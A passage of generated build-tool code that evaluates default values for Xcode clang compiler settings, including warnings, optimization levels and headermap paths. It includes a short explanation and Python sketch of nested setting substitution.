elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "DEFINES_MODULE"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, (eval_val_0 == "YES" and eval_val_1 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_MODULE_IMPLEMENTATION_OF__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_APP_EXTENSION__DefaultValue(xcconfigs, id_configs):
# $(APPLICATION_EXTENSION_API_ONLY)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "APPLICATION_EXTENSION_API_ONLY"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__GCC_CHAR_IS_UNSIGNED_CHAR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_ASM_KEYWORD__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_BUILTIN_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_TRIGRAPHS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_EXCEPTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_CPP_RTTI__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_PASCAL_STRINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_SHORT_ENUMS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_LINK_WITH_DYNAMIC_LIBRARIES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_FLOATING_POINT_LIBRARY_CALLS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ENABLE_CPP_STATIC_DESTRUCTORS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREFIX_HEADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PRECOMPILE_PREFIX_HEADER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_INCREASE_PRECOMPILED_HEADER_SHARING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_GENERATE_DEBUGGING_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_OPTIMIZATION_LEVEL__DefaultValue(xcconfigs, id_configs):
# s
return (False, "s")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_0__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_1__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_2__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_3__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_s__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_fast__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__LLVM_OPTIMIZATION_LEVEL_VAL_z__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__LLVM_IMPLICIT_AGGRESSIVE_OPTIMIZATIONS__DefaultValue(xcconfigs, id_configs):
# $(LLVM_OPTIMIZATION_LEVEL_VAL_$(GCC_OPTIMIZATION_LEVEL))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "LLVM_OPTIMIZATION_LEVEL_VAL_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
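The function above handles a nested substitution, `$(LLVM_OPTIMIZATION_LEVEL_VAL_$(GCC_OPTIMIZATION_LEVEL))`: the inner setting is resolved first and its value is spliced into the outer key before that key is looked up. The expansion order can be sketched with a small illustrative helper (the `expand` function below is a sketch, not how Xcode or the generator actually implements it):

```python
import re

def expand(expr, settings):
    # Repeatedly replace the innermost $(NAME) reference. The regex only
    # matches names with no nested "$(" inside, so composed keys like
    # LLVM_OPTIMIZATION_LEVEL_VAL_$(GCC_OPTIMIZATION_LEVEL) become
    # LLVM_OPTIMIZATION_LEVEL_VAL_s before the outer lookup happens.
    pattern = re.compile(r"\$\(([A-Za-z0-9_]+)\)")
    while True:
        m = pattern.search(expr)
        if not m:
            return expr
        expr = expr[:m.start()] + settings.get(m.group(1), "") + expr[m.end():]

settings = {
    "GCC_OPTIMIZATION_LEVEL": "s",
    "LLVM_OPTIMIZATION_LEVEL_VAL_s": "NO",
}
result = expand("$(LLVM_OPTIMIZATION_LEVEL_VAL_$(GCC_OPTIMIZATION_LEVEL))", settings)
```

This mirrors why the generated Starlark computes `eval_val_0` first and then formats it into `eval_key_1`.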
def _com_apple_compilers_llvm_clang_1_0__LLVM_LTO__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_NO_COMMON_BLOCKS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_REUSE_STRINGS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_DYNAMIC_NO_PIC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_ENABLE_KERNEL_DEVELOPMENT__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_IMPLICIT_FUNCTION_DECLARATIONS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_TREAT_INCOMPATIBLE_POINTER_TYPE_WARNINGS_AS_ERRORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_FIELD_INITIALIZERS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_MISSING_PROTOTYPES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_ABOUT_RETURN_TYPE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DOCUMENTATION_COMMENTS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_UNREACHABLE_CODE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NULLABLE_TO_NONNULL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_ATOMIC_PROPERTIES__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DIRECT_OBJC_ISA_USAGE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_INTERFACE_IVARS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_MISSING_PROPERTY_SYNTHESIS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_ROOT_CLASS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_REPEATED_USE_OF_WEAK__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_EXPLICIT_OWNERSHIP_TYPE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_NON_VIRTUAL_DESTRUCTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_HIDDEN_VIRTUAL_FUNCTIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__EXIT_TIME_DESTRUCTORS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__ARC_BRIDGE_CAST_NONARC__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN__DUPLICATE_METHOD_MATCH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_TYPECHECK_CALLS_TO_PRINTF__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INITIALIZER_NOT_FULLY_BRACKETED__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MISSING_PARENTHESES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_CHECK_SWITCH_STATEMENTS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_FUNCTION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNUSED_LABEL__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_EMPTY_BODY__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNINITIALIZED_AUTOS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNKNOWN_PRAGMAS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_INHIBIT_ALL_WARNINGS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_PEDANTIC__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SHADOW__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_FOUR_CHARACTER_CONSTANTS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CONSTANT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_INT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_BOOL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ENUM_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_FLOAT_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_NON_LITERAL_NULL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_OBJC_LITERAL_CONVERSION__DefaultValue(xcconfigs, id_configs):
# $(CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CLANG_WARN_SUSPICIOUS_IMPLICIT_CONVERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_MISSING_NOESCAPE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRAGMA_PACK__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_PRIVATE_MODULE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_VEXING_PARSE__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DELETE_NON_VIRTUAL_DTOR__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ASSIGN_ENUM__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_SIGN_COMPARE__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_MULTIPLE_DEFINITION_TYPES_FOR_SELECTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_STRICT_SELECTOR_MATCH__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__GCC_WARN_UNDECLARED_SELECTOR__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_CXX0X_EXTENSIONS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_WARN_ATOMIC_IMPLICIT_SEQ_CST__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_TRIVIAL_AUTO_VAR_INIT__DefaultValue(xcconfigs, id_configs):
# uninitialized
return (False, "uninitialized")
def _com_apple_compilers_llvm_clang_1_0__WARNING_CFLAGS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PRODUCT_TYPE_PREPROCESSOR_DEFINITIONS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__GCC_PREPROCESSOR_DEFINITIONS_NOT_USED_IN_PRECOMPS__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_NS_ASSERTIONS__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__ENABLE_STRICT_OBJC_MSGSEND__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__USE_HEADERMAP__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_compilers_llvm_clang_1_0__HEADERMAP_FILE_FORMAT__DefaultValue(xcconfigs, id_configs):
# traditional
return (False, "traditional")
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME).hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_GENERATED_FILES__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-generated-files.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-generated-files.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_OWN_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-own-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-own-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-all-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-all-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_ALL_NON_FRAMEWORK_TARGET_HEADERS__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-all-non-framework-target-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, "{eval_val_0}/{eval_val_1}-all-non-framework-target-headers.hmap".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1))
def _com_apple_compilers_llvm_clang_1_0__CPP_HEADERMAP_FILE_FOR_PROJECT_FILES__DefaultValue(xcconfigs, id_configs):
# $(TEMP_DIR)/$(PRODUCT_NAME)-project-headers.hmap
used_user_content = False
eval_val_0 = ""
eval_key_0 = "TEMP_DIR"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "PRODUCT_NAME"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
